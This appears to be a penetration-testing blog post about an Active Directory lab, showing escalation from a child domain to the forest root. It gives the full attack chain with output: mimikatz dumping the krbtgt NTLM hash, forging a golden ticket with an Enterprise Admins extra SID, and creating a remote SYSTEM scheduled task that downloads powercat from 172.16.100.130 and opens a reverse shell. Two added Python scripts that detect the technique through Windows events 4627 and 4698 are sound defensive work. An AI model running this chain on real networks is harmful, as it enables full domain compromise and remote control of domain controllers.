An SSK-insured hacker says: "So you became Domain Admin? There's an Enterprise Admin waiting for you there... (déjà vu?)"
In our previous post, by abusing SID History we managed to run the ls command on the DC in the root domain through the CIFS service with Enterprise Admin rights. This time our goal is a reverse shell. So how do we do that? The attack format is actually the same; the only difference is that instead of the trust key we will use the krbtgt account's NTLM hash. Let's get started!
We are already DA, so let's run a dump on the child domain's DC with mimikatz...
[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # lsadump::lsa /patch
Domain : dcorp / S-1-5-21-1874506631-3219952063-538504511
RID : 000001f4 (500)
User : Administrator
LM :
NTLM : af0686cc0ca8f04df42210c9ac980760
RID : 000001f5 (501)
User : Guest
LM :
NTLM :
RID : 000001f6 (502)
User : krbtgt
LM :
NTLM : ff46a9d8bd66c6efd77603da26796f35
Great, the NTLM hash we need is ntlm:ff46a9d8bd66c6efd77603da26796f35
Next, let's get the domain SIDs.
PS C:\Windows\system32> Import-Module C:\AD\PowerSploit\Recon\Recon.psd1
PS C:\Windows\system32> Get-DomainSID
S-1-5-21-1874506631-3219952063-538504511
PS C:\Windows\system32> Get-DomainSID -Domain moneycorp.local
S-1-5-21-280534878-1496970234-700767426
Now let's launch the attack with mimikatz and create a ticket. But first, let's run a test.
PS C:\Windows\system32> gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
gwmi : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))
At line:1 char:1
+ gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.lo ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException
+ FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand
Yes, as expected, we got an error. Now let's create the TGT and inject it into memory.
PS C:\Windows\system32> Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\krbtgt_tkt.kirbi"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\krbtgt_tkt.kirbi
User : Administrator
Domain : dollarcorp.moneycorp.local (DOLLARCORP)
SID : S-1-5-21-1874506631-3219952063-538504511
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-280534878-1496970234-700767426-519 ;
ServiceKey: ff46a9d8bd66c6efd77603da26796f35 - rc4_hmac_nt
Lifetime : 1/27/2021 12:28:00 PM ; 1/25/2031 12:28:00 PM ; 1/25/2031 12:28:00 PM
-> Ticket : C:\AD\krbtgt_tkt.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
PS C:\Windows\system32> Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\krbtgt_tkt.kirbi"'
.#####. mimikatz 2.1.1 (x64) built on Nov 29 2018 12:37:56
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::ptt C:\AD\krbtgt_tkt.kirbi
* File: 'C:\AD\krbtgt_tkt.kirbi': OK
Great! Let's repeat the check.
PS C:\Windows\system32> gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local
SystemDirectory : C:\Windows\system32
Organization :
BuildNumber : 14393
RegisteredUser : Windows User
SerialNumber : 00377-80000-00000-AA867
Version : 10.0.14393
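The check below is an added example, not code from the post: it shows how a defender can catch what the golden ticket above relies on, an account logging on with a privileged group SID that belongs to a domain other than its own. It models Windows Security event 4627 (Group Membership Information) records as dicts, uses the two lab domain SIDs quoted above, and generalizes the /sids: case to the 512, 518 and 519 RIDs; the sample events are constructed.

```python
"""Flag logons whose group list carries a privileged SID from a foreign domain,
the SID History / Extra SIDs trick the golden ticket above relies on.
Added example, not part of the original post. Events are modelled on Windows
Security event 4627 (Group Membership Information) as dicts; the samples are
constructed and the two domain SIDs are the lab SIDs quoted in the post."""
import re

CHILD_SID = "S-1-5-21-1874506631-3219952063-538504511"  # dollarcorp (child)
ROOT_SID = "S-1-5-21-280534878-1496970234-700767426"    # moneycorp (forest root)
# Privileged well-known RIDs; 519 (Enterprise Admins) is what /sids: injects.
PRIVILEGED_RIDS = {512: "Domain Admins", 518: "Schema Admins", 519: "Enterprise Admins"}
SID_RE = re.compile(r"^(S-1-5-21-\d+-\d+-\d+)-(\d+)$")

def split_sid(sid):
    """Return (domain_sid, rid) for a domain SID, None for well-known/builtin ones."""
    m = SID_RE.match(sid)
    return (m.group(1), int(m.group(2))) if m else None

def foreign_privileged_groups(event):
    """(group_sid, name) pairs whose domain differs from the account's own domain
    and whose RID is privileged; legitimate group SIDs stay in the account's domain."""
    acct = split_sid(event["SecurityID"])
    if acct is None:
        return []
    hits = []
    for group in event["GroupMembership"]:
        parts = split_sid(group)
        if parts and parts[0] != acct[0] and parts[1] in PRIVILEGED_RIDS:
            hits.append((group, PRIVILEGED_RIDS[parts[1]]))
    return hits

def scan_4627(events):
    """Return [(TargetUserName, hits)] for events carrying foreign privileged SIDs."""
    return [(e["TargetUserName"], h) for e in events if (h := foreign_privileged_groups(e))]

# Constructed samples: a normal child-domain logon, then one whose membership
# carries the forest root's Enterprise Admins SID (RID 519) via SID History.
SAMPLE_EVENTS = [
    {"EventID": 4627, "TargetUserName": "svcadmin", "SecurityID": CHILD_SID + "-1122",
     "GroupMembership": [CHILD_SID + "-513", CHILD_SID + "-512", "S-1-5-32-544"]},
    {"EventID": 4627, "TargetUserName": "Administrator", "SecurityID": CHILD_SID + "-500",
     "GroupMembership": [CHILD_SID + "-513", CHILD_SID + "-512", CHILD_SID + "-519",
                         ROOT_SID + "-519"]},
]

if __name__ == "__main__":
    for user, hits in scan_4627(SAMPLE_EVENTS):
        print("ALERT", user, hits)
```

Running the same logic on the root DC's 4627 events is where the foreign -519 shows up; the only durable fix is SID filtering on the trust, and since Microsoft treats the forest, not the domain, as the security boundary, that is what this alert is meant to highlight.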
Is that a reverse shell on its way? We can get a reverse shell by creating a scheduled task remotely.
First, let's set up a listener. You will need to adjust your firewall settings here.
PS C:\Windows\system32> Import-Module C:\AD\powercat.ps1
PS C:\Windows\system32> powercat -l -v -p 443 -t 10000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
Next, let's create our task.
PS C:\Windows\system32> schtasks.exe /create /S mcorp-dc.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "KUDAY4REVERSE" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString('''http://172.16.100.130/powercat.ps1'''); powercat -c 172.16.100.130 443 -e cmd;'"
WARNING: The task name "KUDAY4REVERSE" already exists. Do you want to replace it (Y/N)? y
SUCCESS: The scheduled task "KUDAY4REVERSE" has successfully been created.
And now let's run our task.
PS C:\Windows\system32> schtasks /Run /S mcorp-dc.moneycorp.local /TN "KUDAY4REVERSE"
SUCCESS: Attempted to run the scheduled task "KUDAY4REVERSE".
Great! Our reverse shell should be coming in.
PS C:\Windows\system32> powercat -l -v -p 443 -t 10000
VERBOSE: Set Stream 1: TCP
VERBOSE: Set Stream 2: Console
VERBOSE: Setting up Stream 1...
VERBOSE: Listening on [0.0.0.0] (port 443)
VERBOSE: Connection from [172.16.1.1] port [tcp] accepted (source port 63105)
VERBOSE: Setting up Stream 2...
VERBOSE: Both Communication Streams Established. Redirecting Data Between Streams...
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>hostname
hostname
mcorp-dc
C:\Windows\system32>
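As an added example (not code from the post), here is a triage routine for Windows Security event 4698 (scheduled task created) that flags the combination used above: a task created by an account from another domain, set to run as SYSTEM, whose action is a PowerShell download cradle. The 4698 record is constructed to mirror the task above; the host domain name is a parameter, and the XML field names follow the Task Scheduler schema that 4698's TaskContent uses.

```python
"""Triage Windows Security event 4698 (scheduled task created) for the pattern
shown above: a task created by a foreign-domain account, running as SYSTEM,
whose action is a PowerShell download cradle.
Added example, not part of the original post; the event below is constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
CRADLE_RE = re.compile(r"DownloadString|Invoke-Expression|\biex\b|https?://", re.I)

def triage_4698(event, host_domain):
    """Return the reasons the task looks suspicious (empty list = nothing found)."""
    reasons = []
    dom, usr = event["SubjectDomainName"], event["SubjectUserName"]
    if dom.upper() != host_domain.upper():
        reasons.append(f"created by foreign-domain account {dom}\\{usr}")
    # Real 4698 TaskContent starts with an encoding="UTF-16" declaration; drop it,
    # since ElementTree refuses a str input that declares a multi-byte encoding.
    xml_text = re.sub(r"^<\?xml[^>]*\?>", "", event["TaskContent"].strip()).strip()
    root = ET.fromstring(xml_text)
    user = root.findtext("t:Principals/t:Principal/t:UserId", default="", namespaces=NS)
    if user.upper() in ("S-1-5-18", "NT AUTHORITY\\SYSTEM"):
        reasons.append("runs as SYSTEM")
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS)
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        if "powershell" in cmd.lower() and CRADLE_RE.search(args):
            reasons.append(f"PowerShell download cradle in task action: {args[:60]}...")
    return reasons

# Constructed 4698 record modelled on the task created in the post.
SAMPLE_4698 = {
    "EventID": 4698, "SubjectUserName": "Administrator", "SubjectDomainName": "DOLLARCORP",
    "TaskName": "\\KUDAY4REVERSE",
    "TaskContent": """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.130/powercat.ps1''); powercat -c 172.16.100.130 443 -e cmd;'</Arguments>
  </Exec></Actions>
</Task>""",
}

if __name__ == "__main__":
    for reason in triage_4698(SAMPLE_4698, "MONEYCORP"):
        print("ALERT", SAMPLE_4698["TaskName"], reason)
```

Pair the 4698 hit with the 4702 (task updated) and 4624 type 3 logon from the same subject to see the remote creation end to end; the "already exists, replace?" prompt in the post is exactly what a 4702 would record.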
From here on, the rest is up to you...